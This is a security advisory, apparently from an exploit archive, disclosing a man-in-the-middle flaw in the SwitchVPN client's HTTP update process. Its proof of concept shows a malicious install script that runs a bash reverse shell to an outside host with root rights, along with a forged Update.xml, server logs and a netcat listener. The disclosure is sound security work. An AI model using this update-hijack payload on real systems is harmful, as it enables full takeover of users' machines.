what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SwitchVPN For MacOS / Windows 2.1012.03 Man-In-The-Middle

SwitchVPN For MacOS / Windows 2.1012.03 Man-In-The-Middle
Posted Nov 14, 2018
Authored by Bernd Leitner

SwitchVPN for MacOS and Windows version 2.1012.03 suffers from a man-in-the-middle vulnerability.

tags | exploit
systems | windows
SHA-256 | bb38df2916279a67eae167360690706c54013599fd3e8810b088263a9fa9d6b4

SwitchVPN For MacOS / Windows 2.1012.03 Man-In-The-Middle

Change Mirror Download
=======================================================================
Title: Insecure Update Process and RCE
Product: SwitchVPN for MacOS, Windows
Vulnerable version: 2.1012.03
CVE ID: Requested
Impact: Critical
Homepage: https://switchvpn.net/
Identified: 2018-11-01
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================

Vendor description:
-------------------
"By 2015 we were frustrated that the free internet we loved was under
threat.
As experts in online security we believed we could solve this problem. So we
came together as a team to make SwitchVPN, a simple and powerful app to keep
the internet free. SwitchVPN is simple. Install it on your phone, tablet or
laptop, then just switch it on to keep the internet free. SwitchVPN is
powerful.
Our exclusive VPN Service technology is constantly being upgraded by a
dedicated
team of internet security experts."

Source: https://switchvpn.net/


Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker
can leverage the update process to install malware or execute arbitrary code
and fully compromise the system.

Users are urged to disable auto-updates and do not run the manual update
utility
until the issue has been fixed.


Vulnerability overview/description:
-----------------------------------
Insecure Update Process

The update process in the SwitchVPN client is vulnerable to a MiTM
(man-in-the-middle) attack. The client either checks for the availability
of
a new version using the integrated auto-update function, or the user can
manually initiate an update using an update utility. Version information is
pulled from a remote XML file and compared to the version number of the
currently installed SwitchVPN client.

All requests are transmitted over HTTP, which means that an attacker on the
same network is able to intercept and manipulate the traffic.

This means, an attacker can trigger the SwitchVPN client to download a
malicious update package which will be installed on the device. In addition
to that, an attacker is able to implant an installation script
(installscript.qs)
which will get executed immediately with elevated privileges. When
auto-update
is enabled (which is the default setting), this process happens completely
transparent to the user.


Proof of concept
-----------------

In order to demonstrate the issue, a PoC for spawning a remote shell on
MacOS is
presented. A demonstration video can be (temporarily) downloaded from:
https://www.dropbox.com/s/zwczouzh922z2un/poc_switchvpn_update.mov

NOTE: Delivering a malicious payload through the main update package can be
set up
the same way:

1) Prepare malicious installscript.qs:
============================================================================================
...
Component.prototype.createOperations = function()
{
component.createOperations();

installer.execute("touch", "/tmp/pwn.sh");
installer.execute("/bin/sh", new Array("-c", 'echo "bash -i >& /dev/tcp/
192.168.1.2/9999 0>&1" >> /tmp/pwn.sh'));
installer.execute("/bin/sh", new Array("-c", "chmod 755 /tmp/pwn.sh"));
component.addElevatedOperation("Execute", "/tmp/pwn.sh");

installer.installationFinished.connect(this,
Component.prototype.installationFinishedPageIsShown);
}
Component.prototype.installationFinishedPageIsShown = function()
{
console.log("Component.prototype.installationFinishedPageIsShown\n\n");
}
...
============================================================================================

2) Store "installscript.qs" in folder "com.svpn.osx" and compress to
"2.6666.03meta.7z":
============================================================================================
mb:~ b$ shasum 2.6666.03meta.7z
20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f 2.6666.03meta.7z
============================================================================================

3) Prepare "Update.xml" which will be delivered to SwitchVPN client:
============================================================================================
<Updates>
<ApplicationName>{AnyApplication}</ApplicationName>
<ApplicationVersion>1.0.0</ApplicationVersion>
<Checksum>true</Checksum>
<PackageUpdate>
<Name>com.svpn.osx</Name>
<DisplayName>Switch VPN</DisplayName>
<Description>Switch VPN</Description>
<Script>installscript.qs</Script>
<Version>2.6666.03</Version> // <----- New (high) version number to trigger
update
<ReleaseDate>2017-10-12</ReleaseDate>
<Default>true</Default>
<ForcedInstallation>true</ForcedInstallation>
<RequiresAdminRights>true</RequiresAdminRights>
<UpdateFile CompressedSize="12805545" OS="Any" UncompressedSize="33330707"/>
<DownloadableArchives>SwitchVPN.app.7z</DownloadableArchives>
<SHA1>20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f</SHA1> // <----- SHA-1 hash
of 2.6666.03meta.7z
</PackageUpdate>
</Updates>
============================================================================================

4) Perform MiTM attack (e.g. using arpspoof, bettercap, etc...)
============================================================================================
NOTE: Setting up a MiTM environment won't be discussed in this advisory.

Create the following folder structure for the malicious web-server:
/updates/osx/repo/com.svpn.osx

Store Update.xml to:
/updates/osx/repo/Update.xml

Store malicious update data to:
/updates/osx/repo/com.svpn.osx/
-rw-r--r--@ 1 b staff 12805505 Nov 1 14:37 2.6666.03SwitchVPN.app.7z
-rw-r--r--@ 1 b staff 40 Nov 1 14:37 2.6666.03SwitchVPN.app.7z.sha1
-rw-r--r--@ 1 b staff 526 Nov 1 20:36 2.6666.03meta.7z <-----
contains malicious "installscript.qs"
============================================================================================

5) Start SwitchVPN client or run the manual update utility:
============================================================================================
# Requests are successfully redirected to our web-server

Serving HTTP on 0.0.0.0 port 80 ...
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET
/updates/osx/repo/Updates.xml?1775745742 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/Updates.xml?457235306 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z.sha1 HTTP/1.1" 200
-
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z HTTP/1.1" 200 -
...
============================================================================================

6) Receive reverse shell:
============================================================================================
# Start netcat listener before starting SwitchVPN client

mb:~ b$ nc -l 9999

bash: no job control in this shell
bash-3.2# whoami
root
============================================================================================

Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable: 2.1012.03.
Earlier versions might be vulnerable as well. Both, the Windows and MacOS
versions are vulnerable.


Vendor contact timeline:
------------------------
2018-11-01: Contacted vendor through management@switchvpn.net
2018-11-02: Sent advisory and link to PoC video to management@switchvpn.net
2018-11-11: Requested update from vendor
2018-11-12: Informed vendor about advisory release

Solution:
---------
None.


Workaround:
-----------
None.


EOF B. Leitner / @2018


Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close